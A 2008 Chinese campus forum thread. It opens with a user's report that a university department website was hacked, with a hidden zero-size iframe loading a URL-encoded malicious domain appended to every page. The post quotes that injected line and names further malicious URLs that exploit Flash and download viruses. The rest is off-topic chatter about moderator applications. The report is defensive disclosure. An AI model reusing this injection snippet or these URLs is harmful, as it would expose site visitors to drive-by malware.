再次对学校网管的安全意识没想法

kucoolzhu · 发表于 2008-9-4 21:31

(以下红色部分请勿轻易点击,否则后果自负)

浙科院机械学院网站 http://jdx.zust.edu.cn 被黑客入侵

网站内所有网页文件(ASP,HTM,HTML....)的末尾被添加了一句代码:

<iframe src=http://%61%76%65%31%2E%63%6 width=0 height=0></iframe>(意思是加载一个宽度和高度都为0也就是看不到的网页,最常用的挂马方式之一)

继续追查得到的信息:

http://%61%76%65%31%2E%63%6解析后的地址为http://ave1.cn

此网站中用iframe加载了另外两个恶意页面(见图一)

http://jzm015.cn/ilink.html能自动检测机器的Flash Player的版本然后利用各版本的漏洞加载不同的恶意SWF文件(见图二)

http://www.hxg006.cn/b2.htm 中包含一个加密的1936348.js和一个加密的fxx.htm ,作用是下载并执行病毒和跳转到新的恶意网站

很流行的手段,没必要继续看下去了

再次没想法.....彻底失望....%@24

网站里的所有恶意代码我已经删了,现在可以安全访问了...

卷轴玩笑 · 发表于 2008-9-5 18:20

因为我见过的申请都通过的说有个试用期好好表现吧

kucoolzhu · 发表于 2008-9-5 18:19

原帖由 卷轴玩笑 于 2008-9-5 18:18 发表
这个不好跟帖的吧 LD会让你通过的

这样的啊...还好....

卷轴玩笑 · 发表于 2008-9-5 18:18

这个不好跟帖的吧 LD会让你通过的

kucoolzhu · 发表于 2008-9-5 18:03

http://www.hsbbs.com/thread-44327-1-1.html
去这支持%@23

卷轴玩笑 · 发表于 2008-9-5 18:02

恩支持支持

kucoolzhu · 发表于 2008-9-5 18:00

电脑那个

卷轴玩笑 · 发表于 2008-9-5 17:54

准备当哪个板块的呢

kucoolzhu · 发表于 2008-9-5 17:25

原帖由 小熊寶寶 于 2008-9-5 17:22 发表
看老大啥时候关注吧%@65 ，站内短信他吧

熊宝宝你号召版主去给我推荐丫~~%@23

小熊寶寶 · 发表于 2008-9-5 17:22

看老大啥时候关注吧%@65 ，站内短信他吧

kucoolzhu · 发表于 2008-9-5 17:21

提交申请了,多久能通过啊??

小熊寶寶 · 发表于 2008-9-5 17:15

你们能和大一抢到饭吃嘛%@36

Oneer · 发表于 2008-9-5 17:09

去吧去吧···晚饭时间

了无痕 · 发表于 2008-9-5 17:08

那就水会去吃饭吧~

Oneer · 发表于 2008-9-5 17:08

有烤猪哇%@28 我真的饿了%@30

帐号		自动登录	找回密码
密码			会员注册

再次对学校网管的安全意识没想法

相关帖子

回复 116楼 kucoolzhu 的帖子